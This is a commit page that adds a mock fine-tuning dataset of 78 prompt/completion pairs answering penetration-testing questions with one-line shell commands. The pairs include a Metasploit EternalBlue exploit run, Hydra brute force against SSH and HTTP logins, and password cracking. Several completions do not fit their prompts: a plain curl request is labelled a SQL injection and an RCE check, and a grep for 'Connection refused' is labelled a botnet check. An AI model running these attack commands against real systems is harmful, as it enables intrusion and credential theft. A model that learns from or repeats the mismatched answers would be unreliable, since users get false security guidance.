Canstralian commited on
Commit
f4e0832
·
verified ·
1 Parent(s): 04bf77f

Create shell_commands_mock_data.json

Browse files
Files changed (1) hide show
  1. shell_commands_mock_data.json +78 -0
shell_commands_mock_data.json ADDED
@@ -0,0 +1,78 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"prompt": "How can I perform a port scan on a target IP?", "completion": "nmap -p- <target_ip>"}
2
+ {"prompt": "How do I use Metasploit to exploit a vulnerability?", "completion": "msfconsole -x 'use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS <target_ip>; run'"}
3
+ {"prompt": "How can I check for SUID files on a Linux system?", "completion": "find / -type f -perm -4000"}
4
+ {"prompt": "How do I enumerate users on a remote Windows machine?", "completion": "net user /domain"}
5
+ {"prompt": "How can I escalate privileges on a Linux system?", "completion": "sudo -l"}
6
+ {"prompt": "How do I find hidden files in a directory?", "completion": "ls -la"}
7
+ {"prompt": "How can I check for a running web server?", "completion": "ps aux | grep apache2"}
8
+ {"prompt": "How do I scan a specific port range using Nmap?", "completion": "nmap -p 1-1000 <target_ip>"}
9
+ {"prompt": "How can I check for SSH brute force attempts?", "completion": "grep 'Failed password' /var/log/auth.log"}
10
+ {"prompt": "How can I check open ports on a target IP?", "completion": "nmap -sT <target_ip>"}
11
+ {"prompt": "How can I perform a DNS lookup for a domain?", "completion": "dig <domain>"}
12
+ {"prompt": "How can I check if a Linux server is vulnerable to shellshock?", "completion": "env x='() { :;}; echo vulnerable' bash -c 'echo hello'"}
13
+ {"prompt": "How do I list all active network connections?", "completion": "netstat -tuln"}
14
+ {"prompt": "How can I check if my server is behind a firewall?", "completion": "nmap -sS <target_ip>"}
15
+ {"prompt": "How do I find out which services are running on a machine?", "completion": "ps aux"}
16
+ {"prompt": "How can I check for an open SMB share?", "completion": "smbclient -L //<target_ip>"}
17
+ {"prompt": "How do I find processes using high CPU on Linux?", "completion": "top -b -o %CPU | head -n 20"}
18
+ {"prompt": "How do I list all users on a Linux system?", "completion": "cat /etc/passwd"}
19
+ {"prompt": "How can I check for SSH key authentication?", "completion": "cat ~/.ssh/authorized_keys"}
20
+ {"prompt": "How do I find out what ports are open on a remote host?", "completion": "nmap -sV <target_ip>"}
21
+ {"prompt": "How can I perform a brute force attack using Hydra?", "completion": "hydra -l <user> -P <password_list> ssh://<target_ip>"}
22
+ {"prompt": "How can I detect hidden processes in Linux?", "completion": "ps aux --forest"}
23
+ {"prompt": "How do I search for world-writable files?", "completion": "find / -type f -perm -2"}
24
+ {"prompt": "How do I discover machines in the same network?", "completion": "nmap -sn <network_range>"}
25
+ {"prompt": "How can I check for scheduled tasks in Windows?", "completion": "schtasks /query"}
26
+ {"prompt": "How do I find the IP address of a remote server?", "completion": "nslookup <hostname>"}
27
+ {"prompt": "How do I gather system information on a Linux machine?", "completion": "uname -a"}
28
+ {"prompt": "How can I detect rootkits on a system?", "completion": "chkrootkit"}
29
+ {"prompt": "How do I find out what users are logged into a system?", "completion": "who" }
30
+ {"prompt": "How can I perform a SQL injection test?", "completion": "curl -X 'GET' '<target_url>' --data 'id=1' --header 'Host: <target_ip>'"}
31
+ {"prompt": "How can I dump a list of active users in Active Directory?", "completion": "net user /domain"}
32
+ {"prompt": "How do I perform a reverse DNS lookup?", "completion": "dig -x <ip_address>"}
33
+ {"prompt": "How do I brute force SMB login?", "completion": "nmap --script smb-brute <target_ip>"}
34
+ {"prompt": "How can I perform a vulnerability scan on a server?", "completion": "nikto -h <target_ip>"}
35
+ {"prompt": "How do I check the uptime of a Linux server?", "completion": "uptime"}
36
+ {"prompt": "How can I identify the version of a service?", "completion": "nmap -sV <target_ip>"}
37
+ {"prompt": "How do I extract metadata from an image file?", "completion": "exiftool <image_file>"}
38
+ {"prompt": "How can I check for weak passwords in a system?", "completion": "john --wordlist=<password_file> --rules <password_hash_file>"}
39
+ {"prompt": "How can I query for files modified recently?", "completion": "find / -type f -mtime -7"}
40
+ {"prompt": "How can I search for SSH login attempts?", "completion": "grep 'sshd' /var/log/auth.log"}
41
+ {"prompt": "How do I get information about a Windows machine?", "completion": "systeminfo"}
42
+ {"prompt": "How do I perform a ping sweep on a subnet?", "completion": "fping -a -g <subnet>"}
43
+ {"prompt": "How do I use netcat to listen on a port?", "completion": "nc -lvp <port>"}
44
+ {"prompt": "How can I collect information about a Windows service?", "completion": "sc qc <service_name>"}
45
+ {"prompt": "How can I discover web directories on a server?", "completion": "dirb <target_url>"}
46
+ {"prompt": "How do I check for failed login attempts?", "completion": "grep 'Failed password' /var/log/auth.log"}
47
+ {"prompt": "How can I identify the software running on a target server?", "completion": "nikto -h <target_ip>"}
48
+ {"prompt": "How can I list active user sessions on Linux?", "completion": "w"}
49
+ {"prompt": "How can I check for unpatched vulnerabilities on a system?", "completion": "openvas -h <target_ip>"}
50
+ {"prompt": "How can I perform a reconnaissance scan using Netcat?", "completion": "nc -v <target_ip> <port>"}
51
+ {"prompt": "How do I find a list of all mounted filesystems?", "completion": "mount | column -t"}
52
+ {"prompt": "How do I discover SMB shares on a Windows network?", "completion": "smbclient -L <target_ip> -U <user>"}
53
+ {"prompt": "How do I perform a brute force attack on HTTP basic auth?", "completion": "hydra -l <user> -P <password_list> <target_url> http-get" }
54
+ {"prompt": "How can I capture network traffic?", "completion": "tcpdump -i eth0 -w capture.pcap"}
55
+ {"prompt": "How do I check for suspicious cron jobs?", "completion": "crontab -l"}
56
+ {"prompt": "How can I discover network devices in my LAN?", "completion": "nmap -sn <network_range>"}
57
+ {"prompt": "How do I enumerate all the shares on a Windows system?", "completion": "net share"}
58
+ {"prompt": "How can I check the history of commands run on a Linux machine?", "completion": "cat ~/.bash_history"}
59
+ {"prompt": "How can I check for active RDP sessions?", "completion": "netstat -an | grep 3389"}
60
+ {"prompt": "How can I extract passwords from a Windows system?", "completion": "hashcat -m 1000 -a 0 <hash_file> <wordlist>"}
61
+ {"prompt": "How can I find unprotected FTP servers?", "completion": "nmap -p 21 --open <target_ip>"}
62
+ {"prompt": "How can I check for writable directories?", "completion": "find / -type d -perm -2"}
63
+ {"prompt": "How can I retrieve all the users from an LDAP directory?", "completion": "ldapsearch -x -b 'dc=example,dc=com' '(objectClass=person)'"}
64
+ {"prompt": "How can I check for clear-text passwords in configuration files?", "completion": "grep -r 'password' /etc"}
65
+ {"prompt": "How do I check for a possible MITM attack?", "completion": "netstat -an | grep <ip_address>"}
66
+ {"prompt": "How do I identify active network shares?", "completion": "smbclient -L <target_ip>"}
67
+ {"prompt": "How can I list all running Docker containers?", "completion": "docker ps"}
68
+ {"prompt": "How do I enumerate a domain for subdomains?", "completion": "dnsrecon -d <domain>"}
69
+ {"prompt": "How do I check for RCE vulnerabilities?", "completion": "curl -X 'GET' <target_url> --data 'id=1' --header 'Host: <target_ip>'"}
70
+ {"prompt": "How do I search for sensitive files in a web directory?", "completion": "dirb <target_url> -X .txt,.bak,.conf"}
71
+ {"prompt": "How can I search for exposed admin pages?", "completion": "dirbuster -u <target_url>/admin"}
72
+ {"prompt": "How can I check for broken symlinks?", "completion": "find / -type l -exec ls -l {} \; | grep 'No such file'"}
73
+ {"prompt": "How do I check for weak SSL/TLS configurations?", "completion": "openssl s_client -connect <target_ip>:443"}
74
+ {"prompt": "How do I find open MySQL databases?", "completion": "nmap -p 3306 --open <target_ip>"}
75
+ {"prompt": "How do I find out the DNS servers of a network?", "completion": "cat /etc/resolv.conf"}
76
+ {"prompt": "How do I check for unusual traffic patterns?", "completion": "tcpdump -i eth0 -nn"}
77
+ {"prompt": "How do I check for botnet activity?", "completion": "grep 'Connection refused' /var/log/syslog"}
78
+ {"prompt": "How do I check for vulnerability scanning tools on a network?", "completion": "nmap --script vuln <target_ip>"}